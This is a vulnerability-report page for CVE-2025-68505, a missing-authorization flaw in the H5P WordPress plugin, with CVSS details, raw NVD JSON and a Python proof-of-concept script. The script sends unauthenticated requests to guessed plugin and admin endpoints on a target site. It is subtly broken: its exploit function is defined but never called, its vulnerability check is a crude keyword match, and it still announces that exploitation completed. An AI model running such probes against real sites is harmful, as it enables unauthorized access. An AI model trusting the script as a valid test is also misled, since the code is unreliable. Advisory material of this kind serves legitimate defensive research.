Security Vulnerability Report
中文
CVE-2025-68505 CVSS 5.3 MEDIUM

CVE-2025-68505

Published: 2025-12-24 13:16:20
Last Modified: 2026-04-27 19:16:26

Description

Missing Authorization vulnerability in icc0rz H5P h5p allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects H5P: from n/a through <= 1.16.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

H5P WordPress Plugin <= 1.16.1
H5P (all versions from initial release through 1.16.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68505 PoC - WordPress H5P Missing Authorization # Target: WordPress site with H5P plugin <= 1.16.1 # This PoC demonstrates accessing protected H5P endpoints without authorization import requests import sys def check_vulnerability(target_url): """ Check if target WordPress site is vulnerable to CVE-2025-68505 """ vulnerabilities = [] # Common H5P endpoints that might be accessible without authorization endpoints = [ "/wp-content/plugins/h5p/h5p-ajax.php", "/wp-content/plugins/h5p/libraries/H5P.Question-1.5/scripts/h5p-question.js", "/wp-admin/admin-ajax.php?action=h5p_get_library_details", "/wp-json/h5p/v1/" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, headers=headers, timeout=10, verify=False) # If we get a 200 response instead of 401/403, endpoint might be accessible if response.status_code == 200 and 'wordpress' in response.text.lower(): vulnerabilities.append(f"Potentially vulnerable endpoint: {url}") except requests.RequestException as e: pass return vulnerabilities def exploit_h5p_access_control(target_url): """ Attempt to access H5P content without proper authorization """ results = [] # Try to access H5P library files library_paths = [ "/wp-content/uploads/h5p/libraries/", "/wp-content/plugins/h5p/library.json" ] for path in library_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: results.append(f"Accessible: {url}") except: pass return results if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68505-poc.py <target_url>") print("Example: python cve-2025-68505-poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Checking target: {target}") print(f"[*] Testing CVE-2025-68505 - H5P Missing Authorization\n") vulns = check_vulnerability(target) if vulns: print("[+] Potential vulnerabilities found:") for v in vulns: print(f" - {v}") else: print("[-] No obvious vulnerabilities detected") print("\n[*] Exploitation attempt completed") print("[*] Recommendation: Update H5P plugin to version > 1.16.1")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68505", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:20.400", "lastModified": "2026-04-27T19:16:25.937", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in icc0rz H5P h5p allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects H5P: from n/a through <= 1.16.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/h5p/vulnerability/wordpress-h5p-plugin-1-16-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}